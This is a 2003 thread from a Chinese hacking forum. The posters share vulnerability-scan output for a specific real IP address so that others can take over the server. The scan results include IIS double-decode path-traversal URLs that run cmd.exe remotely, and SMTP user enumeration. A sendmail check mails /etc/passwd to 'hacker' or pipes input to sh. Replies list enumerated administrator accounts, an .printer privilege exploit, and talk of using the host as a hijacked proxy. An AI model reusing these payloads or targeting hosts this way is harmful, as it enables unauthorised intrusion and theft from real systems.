|
 | 作者: lyice [lyice]
 论坛用户 |
登录 |
| 启动h0lescaner v4.10 漏洞扫描引擎...开始扫描...... 目标IP地址为:61.182.239.242 扫描目标主机开放的端口: 25号端口(smtp)开放! 80号端口(未知)开放! 113号端口(auth)开放! 135号端口(未知)开放! 139号端口(nbsession)开放! 443号端口(未知)开放! 1025号端口(未知)开放! 1026号端口(未知)开放! 开始扫描FTP漏洞: 目标没有开放FTP服务... 开始扫描SMTP漏洞: SMTP服务器的Banner: 220 czsli Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at Wed, 5 Feb 2003 18:20:36 +0800 214-This server supports the following commands: 214 HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH TURN ATRN ETRN BDAT VRFY 可以使用RCPT命令获得用户名列表. 可以使用VRFY命令获得用户名列表. 超时错误! 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 05 Feb 2003 10:28:39 GMT Connection: Keep-Alive Content-Length: 1162 Content-Type: text/html Set-Cookie: ASPSESSIONIDGQQQUIIY=GNGFHOGAHJBLGAKMOOHNOILF; path=/ Cache-control: private 开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 发现/_vti_inf.html漏洞 开始扫描IIS漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 05 Feb 2003 10:30:25 GMT Connection: Keep-Alive Content-Length: 1162 Content-Type: text/html Set-Cookie: ASPSESSIONIDGQQQUIIY=PNGFHOGAAMEDELFEHINIKINJ; path=/ Cache-control: private 开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 发现/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞 发现/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞 发现/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞 发现/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞 开始扫描RPC漏洞: 目标没有开放RPC查询服务... 说明:扫描NTUSER漏洞:------此功能基于NT/2K以上版本的系统 说明:查询SHARES:------此功能基于NT/2K以上版本的系统 说明:查询USERS:------此功能基于NT/2K以上版本的系统 说明:查询GROUPS:------此功能基于NT/2K以上版本的系统 说明:查询TRANSPORTS:------此功能基于NT/2K以上版本的系统 说明:查询DATETIME:------此功能基于NT/2K以上版本的系统 说明:查询SERVICES:------此功能基于NT/2K以上版本的系统 说明:查询SESSIONS:------此功能基于NT/2K以上版本的系统 说明:查询REGISTRY:------此功能基于NT/2K以上版本的系统 说明:查询MORE:------此功能基于NT/2K以上版本的系统 扫描完毕!!! 尝试利用RCPT命令获得目标机上存在的一些常见用户名: root test www web sybase oracle informix guest sam_exec + oracle8 access user ftp account backup owc datebase public info wais news bbs adm sync john sports china 检查decode别名: 检查漏洞 检查debug漏洞 检查kill漏洞 检查wiz漏洞 检查rcpt to: /tmp/.rhosts漏洞 检查+ +漏洞 检查RSET漏洞 检查mail from: |/bin/mail hacker < /etc/passwd漏洞 检查RSET漏洞 检查mail from: |tail|sh漏洞 [此贴被 我就是我(lyice) 在 02月05日20时59分 编辑过] |
| 地主 发表时间: 2003-02-05 20:12:59 |
 | 回复: gfabcde [gfabcde]  论坛用户 |
登录 |
|
谢谢~ 正愁找不到代理我QQ的服务器呢 |
| B1层 发表时间: 02/05 21:11 |
| 回复: vishx [vishx]  论坛用户 |
登录 |
|
发现/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞 发现/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞 发现/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞 发现/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞 |
| B2层 发表时间: 02/06 16:31 |
 | 回复: junjuntop [junjuntop] 论坛用户 |
登录 |
|
IIS漏洞是它致命的弱点 |
| B3层 发表时间: 02/13 17:36 |
 | 回复: freeip [freeip] 论坛用户 |
登录 |
|
安全方面很差的一个服务器,真是要命~ |
| B4层 发表时间: 02/13 21:12 |
 | 回复: alixlinn [alixlinn]  论坛用户 |
登录 |
|
端口扫描 80(HTTP) 21(FTP Control) 110(POP3) 25(SMTP) 443(HTTPS) 139(SMB) 139(SMB) -------------------------------------------------------------------------------- IPC扫描 获得用户列表 Administrator (Admin) Guest IUSR_CZSLI IWAM_CZSLI newtimeserver (Admin) TsInternetUser -------------------------------------------------------------------------------- IIS扫描 IIS 远程执行: Remote Execute-E FrontPage: FrontPage 扩展 -------------------------------------------------------------------------------- CGI扫描 WEB版本信息: Microsoft-IIS/5.0 扫描成功CGI漏洞 /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\ (HTTP: 200 ) /_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 ) /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ (HTTP: 200 ) /scripts/samples/search/query.idq (HTTP: 200 ) /scripts/samples/search/filesize.idq (HTTP: 200 ) /scripts/samples/search/simple.idq (HTTP: 200 ) /scripts/samples/search/author.idq (HTTP: 200 ) /scripts/samples/search/queryhit.idq (HTTP: 200 ) /scripts/samples/search/qfullhit.htw (HTTP: 200 ) /scripts/samples/search/filetime.idq (HTTP: 200 ) /scripts/samples/search/qsumrhit.htw (HTTP: 200 ) /_vti_bin/shtml.dll/_vti_rpc (HTTP: 200 ) /_vti_bin/shtml.exe (HTTP: 200 ) /blabla.idq (HTTP: 200 ) /_vti_inf.html (HTTP: 200 ) /_vti_bin/shtml.dll (HTTP: 200 ) /_vti_bin/fpcount.exe (HTTP: 502 ) /abczxv.htw (HTTP: 200 ) /?PageServices (HTTP: 200 ) /*.idq (HTTP: 200 ) /*.ida (HTTP: 200 ) -------------------------------------------------------------------------------- Plugins IIS5.0 .Printer Exploit(Grant System Privileges) 这样的肉鸡最好别要,不长久!很容易被人偷去。你又不可能免费帮他升级系统。 |
| B5层 发表时间: 02/16 00:47 |
| 回复: vishx [vishx] 论坛用户 |
登录 |
|
IPC扫描 获得用户列表 Administrator (Admin) Guest IUSR_CZSLI IWAM_CZSLI newtimeserver (Admin) TsInternetUser -------------------------------------------------------------------------------- IIS扫描 IIS 远程执行: Remote Execute-E FrontPage: FrontPage 扩展 |
| B6层 发表时间: 02/16 09:22 |
| 回复: junjuntop [junjuntop] 论坛用户 |
登录 |
|
呵呵!~ |
| B7层 发表时间: 02/16 12:38 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 这样的服务器怎么样?哈哈太菜